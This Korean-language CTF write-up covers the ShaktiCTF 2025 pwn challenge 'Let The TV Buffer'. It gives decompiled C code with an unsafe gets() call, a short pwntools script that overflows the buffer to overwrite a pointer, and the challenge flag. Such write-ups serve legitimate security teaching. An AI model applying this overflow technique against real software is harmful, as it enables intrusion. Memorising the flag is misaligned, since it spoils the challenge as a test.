Home
System Hacking
📺

[ShaktiCTF 2025][Pwn] Let The TV Buffer

Type
CTF
년도
2025
Name
ShaktiCTF
분야
System
세부분야
BOF
2025/07/28 00:38
1 more property

# Description

The TV is supposed to be buffering. But it isn't doing that now. Strange. Author: omelette_keychain
Plain Text
복사

# 분석

int __fastcall main(int argc, const char **argv, const char **envp) { char s[70]; // [rsp+0h] [rbp-60h] BYREF _BYTE v5[10]; // [rsp+46h] [rbp-1Ah] BYREF FILE *stream; // [rsp+50h] [rbp-10h] char *v7; // [rsp+58h] [rbp-8h] v7 = "3735928559"; puts("The TV usually keeps buffering. It isn't doing that now for some reason. I dunno why."); puts("I need to show my cool TV fixing skills for the upcoming science fair!"); puts("I wonder what i can do to put it back to how it originally was... Any ideas? \nReply >> "); gets(v5, argv); if ( v7 != "3735928559" ) { stream = fopen("flag.txt", "r"); puts("The TV is back to buffering! Thanks!"); puts("...wait. It is showing some sorta secret code."); if ( !stream ) printf("Error in opening the flag file. Flag file might be missing."); fgets(s, 59, stream); puts(s); exit(0); } puts("Hmmm. It doen't work. Nice try though!"); return 0; }
C
복사
v7 값만 덮어쓰면 된다.
v5getsBufferOverFlow가 가능한 함수이며, v7만 덮어쓰면 된다.

# Payload

from pwn import * filename = "./let_the_tv_buffer" p = process(filename) payload = b"A"*0x1A p.sendlineafter(">> ", payload) p.interactive()
Python
복사

# Flag

ShaktiCTF{@nd_th@t's_h0w_th3_buff3r_0v3rfl0w3d_tv_c00k3d!}
Plain Text
복사